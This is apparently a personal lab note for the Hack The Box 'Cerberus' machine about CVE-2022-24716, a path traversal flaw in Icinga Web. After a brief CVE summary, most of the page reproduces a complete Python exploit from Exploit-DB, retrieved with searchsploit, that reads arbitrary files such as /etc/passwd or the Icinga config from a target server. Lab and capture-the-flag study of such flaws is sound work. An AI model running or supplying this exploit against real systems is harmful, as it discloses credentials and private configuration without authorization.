InfoSec LAB

Cerberus_CVE-2022-24716

Created: 2 min read

CVE-2022-24716

a vulnerability classified as critical has been found in icinga web up to 2.9.5. Affected is an unknown functionality of the component Configuration File Handler. The manipulation with an unknown input leads to a path traversal vulnerability. CWE is classifying the issue as CWE-22. The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. This is going to have an impact on confidentiality.

exploit

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ searchsploit -x php/webapps/51329.py
  Exploit: Icinga Web 2.10 - Arbitrary File Disclosure
      URL: https://www.exploit-db.com/exploits/51329
     Path: /usr/share/exploitdb/exploits/php/webapps/51329.py
    Codes: CVE-2022-24716
 Verified: False
File Type: Python script, ASCII text executable
 
 
#!/usr/bin/env python3
 
# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure
# Date: 2023-03-19
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24716
# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
 
import argparse
import requests
from termcolor import colored
 
def print_message(message, type):
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') +  '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') +  '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') +  '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') +  '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') +  '] ' + message)
 
def get_normalized_url(url):
    if url[-1] != '/':
        url += '/'
    if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
        url = "http://" + url
    return url
 
def get_proxy_protocol(url):
    if url[0:8].lower() == 'https://':
        return 'https'
    return 'http'
 
parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')
parser.add_argument('TARGET', type=str,
                help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')
parser.add_argument('FILE', type=str,
                help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')
parser.add_argument('-P','--proxy', type=str,
                help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
args = parser.parse_args()
 
if args.proxy:
    proxy_url = get_normalized_url(args.proxy)
    proxy_protocol = get_proxy_protocol(proxy_url)
    proxies = { proxy_protocol: proxy_url }
else:
    proxies = {}
 
base_url = get_normalized_url(args.TARGET)
exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE
 
request = requests.get(base_url, proxies=proxies)
if request.status_code == 404:
        print_message("Could not connect to provided URL!", "ERROR")
        exit()
 
request = requests.get(exploit_url, proxies=proxies)
file_content = request.text
 
print(file_content)

Interactive Graph View

Backlinks